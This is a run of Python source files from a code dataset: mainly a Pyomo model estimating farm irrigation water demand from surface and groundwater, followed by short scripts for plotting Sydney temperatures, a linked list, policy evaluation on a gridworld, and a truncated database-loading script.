Param(fwm.farm_ids, initialize=gammas_sw, mutable=True)\nfwm.land_constraints = Param(fwm.farm_ids, initialize=land_constraints_by_farm, mutable=True)\nfwm.water_constraints = Param(fwm.farm_ids, initialize=water_constraints_by_farm, mutable=True)\nfwm.xs_total = Var(fwm.ids, domain=NonNegativeReals, initialize=x_start_values)\nfwm.xs_sw = Var(fwm.ids, domain=NonNegativeReals, initialize=x_start_values)\nfwm.xs_gw = Var(fwm.ids, domain=NonNegativeReals, initialize=x_start_values)\nobs_lu_total = dict(data_profit[\"area_irrigated\"])\nobs_lu_sw = dict(area_irrigated_sw_farm[\"area_irrigated_sw\"])\nobs_lu_gw = dict(area_irrigated_gw_farm[\"area_irrigated_gw\"])\ncrop_counter = 0\n# for key,value in obs_lu_total.items(): # JY TEMP comment out\n# if crop_counter == 53835:\n# crop_counter = 0\n# if value == 0:\n# obs_lu_total[key] = .0001 # NEED TO ACCOUNT FOR THIS IN OBS_LU_SW below\n# obs_lu_sw[crop_counter] += .00005 # JY revised from .0001\n# crop_counter += 1\nfwm.obs_lu_total = Param(fwm.ids, initialize=obs_lu_total, mutable=True)\nfwm.obs_lu_sw = Param(fwm.farm_ids, initialize=obs_lu_sw, mutable=True) # JY EDIT\nfwm.obs_lu_gw = Param(fwm.farm_ids, initialize=obs_lu_gw, mutable=True) # JY EDIT\nfwm.nirs = Param(fwm.ids, initialize=nirs, mutable=True)\n\n## C.2. Constructing model functions: #!JY! 
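# Minimal sketch of the indexed Set/Param/Var wiring used in section C.1
# below (assumes pyomo is installed; indices and values here are invented).
from pyomo.environ import ConcreteModel, Set, Param, Var, NonNegativeReals, value

m = ConcreteModel()
m.farm_ids = Set(initialize=[0, 1])
m.crop_ids_by_farm = Set(m.farm_ids, initialize={0: [0, 1], 1: [2]})
m.net_prices = Param([0, 1, 2], initialize={0: 5.0, 1: 3.0, 2: 4.0}, mutable=True)
m.xs = Var([0, 1, 2], domain=NonNegativeReals, initialize=0.0)
print(sorted(m.crop_ids_by_farm[0]))  # [0, 1]
print(value(m.net_prices[2]))         # 4.0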
test multiply by 1000 to get non-adjusted NIR\ndef obj_fun(fwm):\n return sum(sum((fwm.net_prices_total[h] * fwm.xs_total[h]) for h in fwm.crop_ids_by_farm[f]) +\n sum((fwm.net_prices_sw[i] * fwm.xs_sw[i]) for i in fwm.crop_ids_by_farm[f]) +\n sum((fwm.net_prices_gw[g] * fwm.xs_gw[g]) for g in fwm.crop_ids_by_farm[f]) for f in fwm.farm_ids) # JY double check this!\nfwm.obj_f = Objective(rule=obj_fun, sense=maximize)\n\n# JY need to re-implement this\n# def land_constraint(fwm, ff):\n# return sum(fwm.xs[i] for i in fwm.crop_ids_by_farm_and_constraint[ff]) <= fwm.land_constraints[ff]\n# fwm.c1 = Constraint(fwm.farm_ids, rule=land_constraint)\n\n\ndef obs_lu_constraint_total(fwm, i):\n return fwm.xs_total[i] == fwm.obs_lu_total[i]\nfwm.c3 = Constraint(fwm.ids, rule=obs_lu_constraint_total)\n\ndef obs_lu_constraint_sw(fwm, f):\n return sum(fwm.xs_sw[i] for i in fwm.crop_ids_by_farm[f]) == fwm.obs_lu_sw[f]\nfwm.c4 = Constraint(fwm.farm_ids, rule=obs_lu_constraint_sw)\n\ndef obs_lu_constraint_gw(fwm, f): # JY ADD\n return sum(fwm.xs_gw[i] for i in fwm.crop_ids_by_farm[f]) == fwm.obs_lu_gw[f]\nfwm.c6 = Constraint(fwm.farm_ids, rule=obs_lu_constraint_gw)\n\n# def obs_lu_constraint_sw(fwm, i):\n# return fwm.xs_sw[i] == fwm.obs_lu_sw[i]\n# fwm.c4 = Constraint(fwm.ids, rule=obs_lu_constraint_sw)\n\n# def water_constraint(fwm, ff):\n# return sum(fwm.xs_sw[i]*fwm.nirs[i] for i in fwm.crop_ids_by_farm_and_constraint[ff]) <= fwm.water_constraints[ff]\n# fwm.c2 = Constraint(fwm.farm_ids, rule=water_constraint)\n\n# def obs_lu_constraint_sum(fwm, i):\n# return fwm.xs_sw[i] + fwm.xs_gw[i] == fwm.xs_total[i]\n# fwm.c5 = Constraint(fwm.ids, rule=obs_lu_constraint_sum)\n\nfwm.dual = Suffix(direction=Suffix.IMPORT)\n#\n# def water_constraint(fwm, ff):\n# return sum(fwm.xs_sw[i]*fwm.nirs[i] for i in fwm.crop_ids_by_farm_and_constraint[ff]) <= fwm.water_constraints[ff]\n# fwm.c2 = Constraint(fwm.farm_ids, rule=water_constraint)\n\n## C.3. Solve\nopt = SolverFactory(\"ipopt\", solver_io='nl')\nresults = opt.solve(fwm, keepfiles=False, tee=True)\nprint(results.solver.termination_condition)\n\n## C.1.d. Save duals:\nfrom pyomo.core import Constraint\n\nobs_lu_duals_total = dict()\nfor c in fwm.component_objects(Constraint, active=True):\n if str(c) == \"c3\":\n cobject = getattr(fwm, str(c))\n for index in cobject:\n obs_lu_duals_total[index] = fwm.dual[cobject[index]]\n\nobs_lu_duals_sw = dict()\nfor c in fwm.component_objects(Constraint, active=True):\n if str(c) == \"c4\":\n cobject = getattr(fwm, str(c))\n for index in cobject:\n obs_lu_duals_sw[index] = fwm.dual[cobject[index]]\n\nobs_lu_duals_gw = dict()\nfor c in fwm.component_objects(Constraint, active=True):\n if str(c) == \"c6\":\n cobject = getattr(fwm, str(c))\n for index in cobject:\n obs_lu_duals_gw[index] = fwm.dual[cobject[index]]\n\n# ## C.1.e. 1st stage result: Calculate alpha and gamma:\n# # gamma1 = [((2. 
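# Sketch of the Suffix-based dual extraction idiom used above, on a
# one-variable LP (assumes pyomo plus an ipopt binary are available; all
# numbers are toy values).
from pyomo.environ import (ConcreteModel, Var, Objective, Constraint,
                           Suffix, NonNegativeReals, maximize)
from pyomo.opt import SolverFactory

m = ConcreteModel()
m.x = Var(domain=NonNegativeReals)
m.obj = Objective(expr=3 * m.x, sense=maximize)
m.cap = Constraint(expr=m.x <= 4)
m.dual = Suffix(direction=Suffix.IMPORT)  # ask the solver to report duals
SolverFactory('ipopt', solver_io='nl').solve(m)
print(m.dual[m.cap])  # marginal value of the bound, magnitude ~3 (sign is solver convention)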
* a / b) if (b > 0.0) else 0.0) for a,b in zip(obs_lu_duals.values(),obs_lu.values())]\n# gamma1 = [((a / b) if (b > 0.0) else 0.0) for a, b in zip(obs_lu_duals.values(), obs_lu.values())]\n# alpha1 = [-(0.5 * a * b) for a, b in zip(gamma1, obs_lu.values())]\n# print(alpha1)\n# print(\"+++ alpha check: +++\")\n# print([(a, b) for a, b in zip(alphas, alpha1)])\n# print(\"+++ gamma check: +++\")\n# print([(a, b) for a, b in zip(gammas, gamma1)])\n# alphas = alpha1\n# linear_term_sum=[p*y - c - wc*n - a for p,y,c,wc,n,a in zip(prices,yields,land_costs,sw_costs,water_nirs,alphas)]\n# gammas = dict(enumerate(gamma1))\n# net_prices = dict(enumerate(linear_term_sum))\n\n## C.1.e. 1st stage result: Calculate alpha and gamma:\n# gamma1 = [((2. * a / b) if (b > 0.0) else 0.0) for a,b in zip(obs_lu_duals.values(),obs_lu.values())]\ngamma1_total = [((2. * a / b) if (b > 0.0) else 0.0) for a, b in zip(obs_lu_duals_total.values(), obs_lu_total.values())]\nalpha1_total = [-(0.5 * a * b) for a, b in zip(gamma1_total, obs_lu_total.values())]\nprint(alpha1_total)\nprint(\"+++ alpha check: +++\")\nprint([(a, b) for a, b in zip(alphas_total, alpha1_total)])\nprint(\"+++ gamma check: +++\")\nprint([(a, b) for a, b in zip(gammas_total, gamma1_total)])\nalphas_total = alpha1_total\n\nlinear_term_sum_total = [p*y - c - aland for p,y,c,aland in zip(prices, yields, land_costs, alphas_total)]\ngammas_total = dict(enumerate(gamma1_total))\n\nnet_prices_total = dict(enumerate(linear_term_sum_total))\n\ngamma1_sw = [((2. * a / b) if (b > 0.0) else 0.0) for a, b in zip(obs_lu_duals_sw.values(), obs_lu_sw.values())]\nalpha1_sw = [-(0.5 * a * b) for a, b in zip(gamma1_sw, obs_lu_sw.values())]\nprint(alpha1_sw)\nprint(\"+++ alpha check: +++\")\nprint([(a, b) for a, b in zip(alphas_sw, alpha1_sw)])\nprint(\"+++ gamma check: +++\")\nprint([(a, b) for a, b in zip(gammas_sw, gamma1_sw)])\nalphas_sw = dict(enumerate(alpha1_sw))\ngammas_sw = dict(enumerate(gamma1_sw))\n\ngamma1_gw = [((2. 
* a / b) if (b > 0.0) else 0.0) for a, b in zip(obs_lu_duals_gw.values(), obs_lu_gw.values())]\nalpha1_gw = [-(0.5 * a * b) for a, b in zip(gamma1_gw, obs_lu_gw.values())]\nprint(alpha1_gw)\nalphas_gw = dict(enumerate(alpha1_gw))\ngammas_gw = dict(enumerate(gamma1_gw))\n\nimport datetime\nstart_time = datetime.datetime.now()\n# chunk_size = 555 # JY temp, eventually convert into a loop\nchunk_size = 1\nno_of_chunks = len(farm_ids) / chunk_size\n\nfirst = True\nfor n in [1]:\n# for n in range(int(1)):\n# for n in range(int(no_of_chunks)):\n print('starting chunk: ' + str(n))\n # subset farm ids\n # farm_ids_subset = list(range(chunk_size*n, chunk_size*(n+1)))\n farm_ids_subset = list(range(36335, 36336))\n # subset crop ids\n crop_ids_by_farm_subset = {key: crop_ids_by_farm[key] for key in farm_ids_subset}\n ids_subset = []\n for key,list_value in crop_ids_by_farm_subset.items():\n for value in list_value:\n ids_subset.append(value)\n ids_subset_sorted = sorted(ids_subset)\n\n # subset various dictionaries;\n keys_to_extract = list(range(chunk_size*n, chunk_size*(n+1))) # will multiply start and end values by n+1 once integrated in loop\n net_prices_total_subset = {key: net_prices_total[key] for key in ids_subset_sorted}\n net_prices_sw_subset = {key: net_prices_sw[key] for key in ids_subset_sorted}\n net_prices_gw_subset = {key: net_prices_gw[key] for key in ids_subset_sorted}\n # net_prices_gw_subset.update((x, y*2) for x, y in net_prices_gw_subset.items()) ### JY TEMP\n gammas_total_subset = {key: gammas_total[key] for key in ids_subset_sorted}\n nirs_subset = {key: nirs[key] for key in ids_subset_sorted}\n alphas_sw_subset = {key: alphas_sw[key] for key in farm_ids_subset}\n gammas_sw_subset = {key: gammas_sw[key] for key in farm_ids_subset}\n alphas_gw_subset = {key: alphas_gw[key] for key in farm_ids_subset}\n gammas_gw_subset = {key: gammas_gw[key] for key in farm_ids_subset}\n land_constraints_by_farm_subset = {key: land_constraints_by_farm[key] for key in farm_ids_subset}\n water_constraints_by_farm_subset = {key: water_constraints_by_farm[key] for key in farm_ids_subset}\n # water_constraints_by_farm_subset[36335] = 63026538.58 ### JY TEMP\n\n # set price to zero for gammas that are zero\n for key,value in gammas_total_subset.items():\n if value == 0:\n net_prices_total_subset[key] = -9999999999\n\n ## C.2. 2st stage: Quadratic model included in JWP model simulations\n ## C.2.a. Constructing model inputs:\n ## (repetition to be safe - deepcopy does not work on PYOMO models)\n ## C.1. 
Constructing model inputs:\n fwm_s = ConcreteModel()\n fwm_s.ids = Set(initialize=ids_subset_sorted)\n fwm_s.farm_ids = Set(initialize=farm_ids_subset)\n fwm_s.crop_ids_by_farm = Set(fwm_s.farm_ids, initialize=crop_ids_by_farm_subset)\n fwm_s.crop_ids_by_farm_and_constraint = Set(fwm_s.farm_ids, initialize=crop_ids_by_farm_subset)\n fwm_s.net_prices_sw = Param(fwm_s.ids, initialize=net_prices_sw_subset, mutable=True)\n fwm_s.net_prices_total = Param(fwm_s.ids, initialize=net_prices_total_subset, mutable=True)\n fwm_s.net_prices_gw = Param(fwm_s.ids, initialize=net_prices_gw_subset, mutable=True)\n fwm_s.gammas_total = Param(fwm_s.ids, initialize=gammas_total_subset, mutable=True)\n fwm_s.alphas_sw = Param(fwm_s.farm_ids, initialize=alphas_sw_subset, mutable=True)\n fwm_s.gammas_sw = Param(fwm_s.farm_ids, initialize=gammas_sw_subset, mutable=True)\n fwm_s.alphas_gw = Param(fwm_s.farm_ids, initialize=alphas_gw_subset, mutable=True)\n fwm_s.gammas_gw = Param(fwm_s.farm_ids, initialize=gammas_gw_subset, mutable=True)\n fwm_s.land_constraints = Param(fwm_s.farm_ids, initialize=land_constraints_by_farm_subset, mutable=True)\n fwm_s.water_constraints = Param(fwm_s.farm_ids, initialize=water_constraints_by_farm_subset, mutable=True)\n fwm_s.xs_total = Var(fwm_s.ids, domain=NonNegativeReals, initialize=x_start_values)\n fwm_s.xs_sw = Var(fwm_s.ids, domain=NonNegativeReals, initialize=x_start_values)\n fwm_s.xs_gw = Var(fwm_s.ids, domain=NonNegativeReals, initialize=x_start_values)\n # obs_lu_total = dict(data_profit[\"area_irrigated\"])\n # obs_lu_sw = dict(area_irrigated_sw_farm[\"area_irrigated_sw\"])\n # fwm_s.obs_lu_total = Param(fwm_s.ids, initialize=obs_lu_total, mutable=True)\n # fwm_s.obs_lu_sw = Param(fwm_s.ids, initialize=obs_lu_sw, mutable=True)\n fwm_s.nirs = Param(fwm_s.ids, initialize=nirs_subset, mutable=True)\n\n ## C.2. 
Constructing model functions:\n def obj_fun(fwm_s):\n return 0.00001 * sum(sum((fwm_s.net_prices_total[h] * fwm_s.xs_total[h] - 0.5 * fwm_s.gammas_total[h] * fwm_s.xs_total[h] * fwm_s.xs_total[h]) for h in fwm_s.crop_ids_by_farm[f]) +\n sum((fwm_s.net_prices_sw[i] * fwm_s.xs_sw[i]) for i in fwm_s.crop_ids_by_farm[f]) +\n sum((fwm_s.net_prices_gw[g] * fwm_s.xs_gw[g]) for g in fwm_s.crop_ids_by_farm[f]) -\n (fwm_s.alphas_sw[f] * sum(fwm_s.xs_sw[s] for s in fwm_s.crop_ids_by_farm[f])) -\n (fwm_s.alphas_gw[f] * sum(fwm_s.xs_gw[s] for s in fwm_s.crop_ids_by_farm[f])) -\n (0.5 * fwm_s.gammas_sw[f] * sum(fwm_s.xs_sw[t] for t in fwm_s.crop_ids_by_farm[f])) * sum(fwm_s.xs_sw[u] for u in fwm_s.crop_ids_by_farm[f]) -\n (0.5 * fwm_s.gammas_gw[f] * sum(fwm_s.xs_gw[t] for t in fwm_s.crop_ids_by_farm[f])) * sum(fwm_s.xs_gw[u] for u in fwm_s.crop_ids_by_farm[f]) for f in fwm_s.farm_ids) # JY double check this!\n fwm_s.obj_f = Objective(rule=obj_fun, sense=maximize)\n\n # def land_constraint(fwm_s, ff):\n # return sum(fwm_s.xs_total[i] for i in fwm_s.crop_ids_by_farm_and_constraint[ff]) <= fwm_s.land_constraints[ff]\n # fwm_s.c1 = Constraint(fwm_s.farm_ids, rule=land_constraint)\n\n def obs_lu_constraint_sum(fwm_s, i):\n return fwm_s.xs_sw[i] + fwm_s.xs_gw[i] == fwm_s.xs_total[i]\n fwm_s.c5 = Constraint(fwm_s.ids, rule=obs_lu_constraint_sum)\n\n def water_constraint(fwm_s, ff):\n return sum(fwm_s.xs_sw[i]*fwm_s.nirs[i]*1000 for i in fwm_s.crop_ids_by_farm_and_constraint[ff]) <= fwm_s.water_constraints[ff]\n fwm_s.c2 = Constraint(fwm_s.farm_ids, rule=water_constraint)\n\n ## C.2.c Creating and running the solver:\n # start_time = datetime.datetime.now()\n opt = SolverFactory(\"ipopt\", solver_io='nl')\n results = opt.solve(fwm_s, keepfiles=False, tee=True)\n print(results.solver.termination_condition)\n end_time = datetime.datetime.now()\n\n ## D.1. Storing main model outputs:\n result_xs_sw = dict(fwm_s.xs_sw.get_values())\n result_xs_gw = dict(fwm_s.xs_gw.get_values())\n result_xs_total = dict(fwm_s.xs_total.get_values())\n\n # JY results stored as pickle file (results_xs.p). 
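# Tiny standalone version of the quadratic solve-and-extract step below
# (assumes pyomo and ipopt; the single-crop numbers are invented). The
# concave profit 100*x - 0.5*4*x^2 peaks at x = 25, inside the cap of 30.
from pyomo.environ import (ConcreteModel, Var, Objective, Constraint,
                           NonNegativeReals, maximize)
from pyomo.opt import SolverFactory

m = ConcreteModel()
m.x = Var([0], domain=NonNegativeReals, initialize=0.0)
m.obj = Objective(expr=100 * m.x[0] - 0.5 * 4.0 * m.x[0] * m.x[0], sense=maximize)
m.cap = Constraint(expr=m.x[0] <= 30)
results = SolverFactory('ipopt', solver_io='nl').solve(m, tee=False)
print(results.solver.termination_condition)  # expect: optimal
print(dict(m.x.get_values()))                # expect: {0: ~25.0}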
Start here and load pickle files.\n with open('result_xs.p', 'rb') as fp:\n result_xs = pickle.load(fp)\n\n # convert result_xs_sw to pandas dataframe and join to data_profit\n if first is True:\n results_pd = data_profit\n results_pd['xs_gw'] = 0\n results_pd['xs_sw'] = 0\n results_pd['xs_total'] = 0\n results_pd['id'] = results_pd['index']\n first = False\n results_xs_sw_pd = pd.DataFrame.from_dict(result_xs_sw, orient='index')\n results_xs_sw_pd['id'] = results_xs_sw_pd.index + 1\n results_xs_sw_pd = results_xs_sw_pd.rename(columns={0: \"xs_sw_temp\"})\n results_pd = results_pd.merge(results_xs_sw_pd[['id','xs_sw_temp']], how='left', on=['id'])\n results_pd.loc[results_pd['xs_sw_temp'].notnull(), 'xs_sw'] = results_pd['xs_sw_temp']\n results_xs_gw_pd = pd.DataFrame.from_dict(result_xs_gw, orient='index')\n results_xs_gw_pd['id'] = results_xs_gw_pd.index + 1\n results_xs_gw_pd = results_xs_gw_pd.rename(columns={0: \"xs_gw_temp\"})\n results_pd = results_pd.merge(results_xs_gw_pd[['id','xs_gw_temp']], how='left', on=['id'])\n results_pd.loc[results_pd['xs_gw_temp'].notnull(), 'xs_gw'] = results_pd['xs_gw_temp']\n results_xs_total_pd = pd.DataFrame.from_dict(result_xs_total, orient='index')\n results_xs_total_pd['id'] = results_xs_total_pd.index + 1\n results_xs_total_pd = results_xs_total_pd.rename(columns={0: \"xs_total_temp\"})\n results_pd = results_pd.merge(results_xs_total_pd[['id','xs_total_temp']], how='left', on=['id'])\n results_pd.loc[results_pd['xs_total_temp'].notnull(), 'xs_total'] = results_pd['xs_total_temp']\n results_pd = results_pd.drop(['xs_gw_temp', 'xs_sw_temp', 'xs_total_temp'], axis=1)\n\n# JY store results into a pandas dataframe\nresults_pd = results_pd.assign(calc_area=result_xs.values())\nresults_pd['calc_gw_demand'] = results_pd['xs_gw'] * results_pd['nir_corrected'] / 25583.64 # unit conversion from acre-ft/year to m3/s; calc area [acres], nir [acre-ft/acres/year]\nresults_pd['calc_sw_demand'] = results_pd['xs_sw'] * results_pd['nir_corrected'] / 25583.64 # unit conversion from acre-ft/year to m3/s; calc area [acres], nir [acre-ft/acres/year]\nresults_pd['calc_total_demand'] = results_pd['xs_total'] * results_pd['nir_corrected'] / 25583.64 # unit conversion from acre-ft/year to m3/s; calc area [acres], nir [acre-ft/acres/year]\nresults_pivot = pd.pivot_table(results_pd, index=['nldas'], values=['calc_gw_demand', 'calc_sw_demand', 'calc_total_demand'], aggfunc=np.sum) #JY demand is order of magnitude low, double check calcs\n\n# JY export results to csv\nresults_pd = results_pd[['nldas','crop','xs_gw','xs_sw','xs_total','nir_corrected']]\nresults_pd.to_csv('/pic/scratch/yoon644/csmruns/wm_abm_run/run/abm_results_'+ str(year_int))\n\n# read a sample water demand input file\nfile = '/pic/projects/im3/wm/Jim/pmp_input_files/RCP8.5_GCAM_water_demand_1980_01_copy.nc'\nwith netCDF4.Dataset(file, 'r') as nc:\n # for key, var in nc.variables.items():\n # print(key, var.dimensions, var.shape, var.units, var.long_name, var._FillValue)\n\n lat = nc['lat'][:]\n lon = nc['lon'][:]\n demand = nc['totalDemand'][:]\n\n# read NLDAS grid reference file\ndf_grid = pd.read_csv('/pic/projects/im3/wm/Jim/pmp_input_files/NLDAS_Grid_Reference.csv')\n\ndf_grid = df_grid[['CENTERX', 'CENTERY', 'NLDAS_X', 'NLDAS_Y', 'NLDAS_ID']]\n\ndf_grid = df_grid.rename(columns={\"CENTERX\": \"longitude\", \"CENTERY\": \"latitude\"})\ndf_grid['longitude'] = df_grid.longitude + 360\n\n# match netCDF demand file and datagrame\nmesh_lon, mesh_lat = np.meshgrid(lon, lat)\ndf_nc = 
pd.DataFrame({'lon':mesh_lon.reshape(-1,order='C'),'lat':mesh_lat.reshape(-1,order='C')})\ndf_nc['NLDAS_ID'] = ['x'+str(int((row['lon']-235.0625)/0.125+1))+'y'+str(int((row['lat']-25.0625)/0.125+1)) for _,row in df_nc.iterrows()]\ndf_nc['totalDemand'] = 0\n\n# use NLDAS_ID as index for both dataframes\ndf_nc = df_nc.set_index('NLDAS_ID',drop=False)\ntry:\n results_pivot = results_pivot.set_index('nldas',drop=False)\nexcept KeyError:\n pass\n\n# read ABM values into df_nc basing on the same index\ndf_nc.loc[results_pivot.index,'totalDemand'] = results_pivot.calc_sw_demand.values\n\nfor month in months:\n str_year = str(year_int)\n new_fname = '/pic/projects/im3/wm/Jim/pmp_input_files/demand_input/RCP8.5_GCAM_water_demand_'+ str_year + '_' + month + '.nc' # define ABM demand input directory\n shutil.copyfile(file, new_fname)\n demand_ABM = df_nc.totalDemand.values.reshape(len(lat),len(lon),order='C')\n with netCDF4.Dataset(new_fname,'a') as nc:\n nc['totalDemand'][:] = np.ma.masked_array(demand_ABM,mask=nc['totalDemand'][:].mask)\n\nlogging.info('I have successfully written out new demand files for month, year: ' + month + ' ' + year)","sub_path":"MOSART_WM_PMP_stage1_noloop_gwalt2.py","file_name":"MOSART_WM_PMP_stage1_noloop_gwalt2.py","file_ext":"py","file_size_in_byte":23850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"404806841","text":"from csv import reader\nimport matplotlib.pyplot as plt\nfrom calendar import month_name\nfrom collections import deque\n\nstrmax = \"Mean maximum temperature (Degrees C) for years 1859 to 2016 \"\ntmpmax = deque()\nstrmin = \"Mean minimum temperature (Degrees C) for years 1859 to 2016 \"\ntmpmin = deque()\nwith open(\"IDCJCM0037_066062.csv\") as f:\n for row in reader(f):\n if len(row) > 1 and row[0][:30] == strmax[:30]:\n for i in range(12):\n tmpmax.append(float(row[i + 1]))\n if len(row) > 1 and row[0][:30] == strmin[:30]:\n for i in range(12):\n tmpmin.append(float(row[i + 1]))\n if len(tmpmax) and len(tmpmin):\n break\nmintemp = int(min(tmpmin))\nmaxtemp = int(max(tmpmax))\navgmin = (tmpmin[0] + tmpmin[11]) / 2\navgmax = (tmpmax[0] + tmpmax[11]) / 2\ntmpmin.appendleft(avgmin)\ntmpmin.append(avgmin)\ntmpmax.appendleft(avgmax)\ntmpmax.append(avgmax)\nx = [0.5]\nfor i in range(12):\n x.append(i + 1)\nx.append(12.5)\nfig = plt.figure(figsize=(5, 3.5))\nplt.title(\"Mean min and max temperatures in Sydney\", fontsize=10)\nplt.grid(b=True, ls=\"dotted\")\nplt.axis([0.5, 12.5, mintemp - 1, maxtemp + 1])\nplt.plot(x, tmpmin, \"b-\")\nplt.plot(x, tmpmax, \"r-\")\nplt.fill_between(x, tmpmin, tmpmax, color=\"grey\", alpha=\"0.1\")\nxtk = [(i + 1) for i in range(12)]\nplt.xticks(xtk, month_name[1:13], fontsize=8)\nfig.autofmt_xdate(rotation=30)\nytk = []\ni = mintemp\nwhile i <= maxtemp:\n ytk.append(i)\n i += 0.5\nplt.yticks(ytk, fontsize=4)\nplt.show()\n","sub_path":"COMP9021/Lab_6/sydney_temperatures.py","file_name":"sydney_temperatures.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"440163974","text":"class Node:\n\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n\n def __init__(self):\n self.head = None\n\n def print_ll(self):\n temp = self.head\n while temp:\n print(temp.data, end=' ')\n temp = temp.next\n print()\n\n def add_node(self, node, position='end', data=None):\n if position == 'start':\n node.next = self.head\n self.head = node\n elif position == 
'between':\n temp = self.head\n while temp.data != data:\n temp = temp.next\n node.next = temp.next\n temp.next = node\n else:\n temp = self.head\n while temp.next != None:\n temp = temp.next\n temp.next = node\n self.print_ll()\n\nif __name__ == '__main__':\n\n # creating a LinkedList with 3 nodes\n ll = LinkedList()\n ll.head = Node(1)\n second = Node(2)\n third = Node(3)\n\n ll.head.next = second\n second.next = third\n\n # traversing through the LinkedList and printing it\n ll.print_ll()\n\n # adding a node to a LinkedList\n # 1. adding to the beginning\n ll.add_node(Node(4), 'start')\n\n # 2. adding somewhere in between, (actually after)\n ll.add_node(Node(5), 'between', 2)\n\n # 3. adding to the end\n ll.add_node(Node(6), 'end')\n","sub_path":"a100DaysOfCode/day3_code/LinkedList/ll.py","file_name":"ll.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"160523650","text":"################################################################################\n##\n# @file plot.py\n# @date 2017-06-27\n# @author Tiago Lobato Gimenes (tlgimenes@gmail.com)\n#\n# @copyright Tiago Lobato Gimenes 2016. All rights reserved.\n# \n# @section DESCRIPTION\n#\n################################################################################\n\nimport os, sys\n\nimport numpy as np\nfrom scipy.interpolate import spline\n\nimport matplotlib.pyplot as plt\n\n################################################################################\n\ndef extract(path, dtype):\n data = []\n\n for filename in os.listdir(path):\n if filename.find(dtype) > -1:\n ff = open(os.path.join(path, filename));\n line = ff.readline()\n while line:\n data.append(int(line));\n line = ff.readline()\n\n ff.close();\n\n return np.average(data), np.std(data);\n\n################################################################################\n\ncurves = {}\n\nfor c in os.listdir('.'):\n if os.path.isdir(c):\n curves[c] = {}\n curves[c]['x'] = np.sort(np.asarray([x for x in os.listdir(c) if os.path.isdir(os.path.join(c,x))], dtype=np.int32))\n curves[c]['security'] = []\n curves[c]['security_std'] = []\n curves[c]['entertainment'] = []\n curves[c]['entertainment_std'] = []\n curves[c]['comfort'] = []\n curves[c]['comfort_std'] = []\n for x in curves[c]['x']:\n median, std = extract(os.path.join(c, str(x)), 'security')\n curves[c]['security'].append(median) \n curves[c]['security_std'].append(std)\n median, std = extract(os.path.join(c, str(x)), 'entertainment')\n curves[c]['entertainment'].append(median) \n curves[c]['entertainment_std'].append(std)\n median, std = extract(os.path.join(c, str(x)), 'comfort')\n curves[c]['comfort'].append(median) \n curves[c]['comfort_std'].append(std)\n\n################################################################################\n\nsecurity = plt.figure().add_subplot(111)\nentertainment = plt.figure().add_subplot(111)\ncomfort = plt.figure().add_subplot(111)\n\nsecurity. set_title('Security')\nentertainment. set_title('Entertainment')\ncomfort. set_title(\"Comfort\")\n\nfor curvename, curve in curves.items():\n xnew = np.linspace(np.min(curve['x']), np.max(curve['x']), 100)\n security. plot(xnew, spline(curve['x'], curve['security'], xnew), label=curvename)\n entertainment. plot(xnew, spline(curve['x'], curve['entertainment'], xnew), label=curvename)\n comfort. plot(xnew, spline(curve['x'], curve['comfort'], xnew), label=curvename)\n #security. 
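# Library-version note on the plotting code above (illustrative only):
# scipy.interpolate.spline was removed in SciPy 1.3, so on modern SciPy the
# same smoothing step is usually done with make_interp_spline.
import numpy as np
from scipy.interpolate import make_interp_spline

x = np.array([1.0, 2.0, 3.0, 4.0])
y = np.array([0.0, 1.0, 0.0, 1.0])
xnew = np.linspace(x.min(), x.max(), 50)
ynew = make_interp_spline(x, y, k=3)(xnew)  # cubic, like the old spline()
print(ynew.shape)  # (50,)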
errorbar(curve['x'], curve['security'], yerr=curve['security_std'], label=curvename)\n #entertainment. errorbar(curve['x'], curve['entertainment'], yerr=curve['entertainment_std'], label=curvename)\n #comfort. plot(curve['x'], curve['comfort'], label=curvename)\n\nsecurity.legend()\nentertainment.legend()\ncomfort.legend()\n\nplt.show();\n\n################################################################################\n","sub_path":"projeto/log/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430439319","text":"import numpy as np\r\n\r\n\r\nSIZE = 4\r\n\r\n\r\ndef policy_pi(s):\r\n action_distribution = dict()\r\n action_distribution['up'] = 0.25\r\n action_distribution['down'] = 0.25\r\n action_distribution['right'] = 0.25\r\n action_distribution['left'] = 0.25\r\n return action_distribution\r\n\r\n\r\n\r\ndef grid_p(s, a):\r\n edge = {\r\n 'up': [0, 1, 2, 3],\r\n 'down': [12, 13, 14, 15],\r\n 'right': [3, 7, 11, 15],\r\n 'left': [0, 4, 8, 12],\r\n }\r\n s_prime = -1\r\n if s in edge[a]:\r\n s_prime = s\r\n else:\r\n if a == 'up':\r\n s_prime = s - SIZE\r\n if a == 'down':\r\n s_prime = s + SIZE\r\n if a == 'right':\r\n s_prime = s + 1\r\n if a == 'left':\r\n s_prime = s - 1\r\n probability = 1\r\n reward = -1\r\n return probability, s_prime, reward\r\n\r\n\r\ndef iterative_policy_evaluation(pi, p, gamma=1):\r\n S = [i for i in range(1, 15)]\r\n V = [0 for _ in range(16)]\r\n # V_next = []\r\n actions = ['up', 'down', 'right', 'left']\r\n for i in range(3):\r\n\r\n V_next = [i for i in V]\r\n\r\n for s in S:\r\n update = 0\r\n action_distribution = pi(s)\r\n\r\n for a in actions:\r\n action_probability = action_distribution[a]\r\n transition_probability, s_prime, r = p(s, a)\r\n update += action_probability * transition_probability * \\\r\n (r + gamma * V[s_prime])\r\n V_next[s] = update\r\n\r\n V = V_next\r\n print('iteration:', i)\r\n grid_V = np.array(V).reshape((4, 4))\r\n print(grid_V)\r\n\r\n\r\niterative_policy_evaluation(policy_pi, grid_p)\r\n","sub_path":"__OLD_CODE_STORAGE/reinforcement_learning/dryfeet_simple_coding/iterative_policy_evaluation.py","file_name":"iterative_policy_evaluation.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140832905","text":"import mysql.connector\nimport database_credentials\n\ndef populate_xref_dimension_tables():\n conn = mysql.connector.connect(user = database_credentials.user, password = database_credentials.password, database = database_credentials.database)\n cursor = conn.cursor()\n truncate_xref_county = 